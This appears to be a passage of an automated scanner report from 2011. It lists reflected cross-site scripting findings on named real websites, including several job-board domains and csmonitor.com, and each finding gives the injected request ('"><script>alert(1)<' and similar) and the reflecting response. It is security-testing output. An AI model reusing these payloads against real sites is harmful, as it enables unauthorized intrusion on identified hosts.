| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:05 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qi73gk7b0p Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:05 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 106933 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.clevelcrossing |
| Path: | / |
| GET /?55eeb"><script>alert(1)< Host: www.clevelcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:16 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=fqj28nd85k Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:16 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 115435 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.clinicalr |
| Path: | / |
| GET /?858e3"><script>alert(1)< Host: www.clinicalresearch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:24 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=m4vok3ds4b Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:24 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 101481 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.complianc |
| Path: | / |
| GET /?72153"><script>alert(1)< Host: www.compliancecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:33 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=mb7anjkk7a Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 135107 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.computera |
| Path: | / |
| GET /?1752d"><script>alert(1)< Host: www.computeraideddes Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:27 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ed21alnsfs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:27 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 120988 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.construct |
| Path: | / |
| GET /?ac657"><script>alert(1)< Host: www.constructioncrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:33 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=0glasi0fur Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 131646 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.consultin |
| Path: | / |
| GET /?fd97c"><script>alert(1)< Host: www.consultingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:33 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=iko9vh37jo Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 112168 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.contractm |
| Path: | / |
| GET /?d62a6"><script>alert(1)< Host: www.contractmanageme Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:39 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=10pkrahhva Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:39 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111842 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.counselin |
| Path: | / |
| GET /?662a5"><script>alert(1)< Host: www.counselingcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=f5kspj2g81 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149376 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.cplusplus |
| Path: | / |
| GET /?84068"><script>alert(1)< Host: www.cpluspluscrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:24:58 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gj2r0hmde0 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:58 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114876 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/2010/1228/Julian |
| GET /USA2fb27"-alert(1)- Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:11 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Sat, 22 Jan 2011 22:25:11 GMT Date: Fri, 21 Jan 2011 22:25:11 GMT Content-Length: 22031 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA2fb27"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/2010/1228/Julian |
| GET /USA/20101ab91"-alert(1)- Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:19 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86392 Expires: Sat, 22 Jan 2011 22:25:11 GMT Date: Fri, 21 Jan 2011 22:25:19 GMT Content-Length: 22031 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/20101ab91"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/2010/1228/Julian |
| GET /USA/2010/1228e99ca"-alert(1)- Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:31 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86355 Expires: Sat, 22 Jan 2011 22:24:46 GMT Date: Fri, 21 Jan 2011 22:25:31 GMT Content-Length: 22031 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/2010 var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/2010/1228/Julian |
| GET /USA/2010/1228/Julian Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:54 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Sat, 22 Jan 2011 22:25:54 GMT Date: Fri, 21 Jan 2011 22:25:54 GMT Content-Length: 22031 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/2010 var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA1d082"-alert(1)- Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:14 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86399 Expires: Sat, 22 Jan 2011 22:25:13 GMT Date: Fri, 21 Jan 2011 22:25:14 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA1d082"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA/Politicscd583"-alert(1)- Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:23 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86374 Expires: Sat, 22 Jan 2011 22:24:57 GMT Date: Fri, 21 Jan 2011 22:25:23 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/Politicscd583"-alert(1)- var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA/Politics/monitor Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:37 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Sat, 22 Jan 2011 22:25:38 GMT Date: Fri, 21 Jan 2011 22:25:38 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/Politics var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA/Politics/monitor Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:25:52 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86378 Expires: Sat, 22 Jan 2011 22:25:31 GMT Date: Fri, 21 Jan 2011 22:25:53 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/Politics var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA/Politics/monitor Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:26:04 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Sat, 22 Jan 2011 22:26:05 GMT Date: Fri, 21 Jan 2011 22:26:05 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/Politics var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.csmonitor.com |
| Path: | /USA/Politics/monitor |
| GET /USA/Politics/monitor Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Fri, 21 Jan 2011 22:26:15 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86373 Expires: Sat, 22 Jan 2011 22:25:49 GMT Date: Fri, 21 Jan 2011 22:26:16 GMT Content-Length: 22093 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!--seo title--> <tit ...[SNIP]... <script language="JavaScript" type="text/javascript"> s.pageName="/USA/Politics var s_code=s.t();if(s_code </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.customers |
| Path: | / |
| GET /?8654b"><script>alert(1)< Host: www.customerservicec Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:11 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=eq95mr8o98 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119276 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dbacrossing |
| Path: | / |
| GET /?4fd83"><script>alert(1)< Host: www.dbacrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:18 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=eph2bliclb Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125729 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dentalcrossing |
| Path: | / |
| GET /?e0261"><script>alert(1)< Host: www.dentalcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
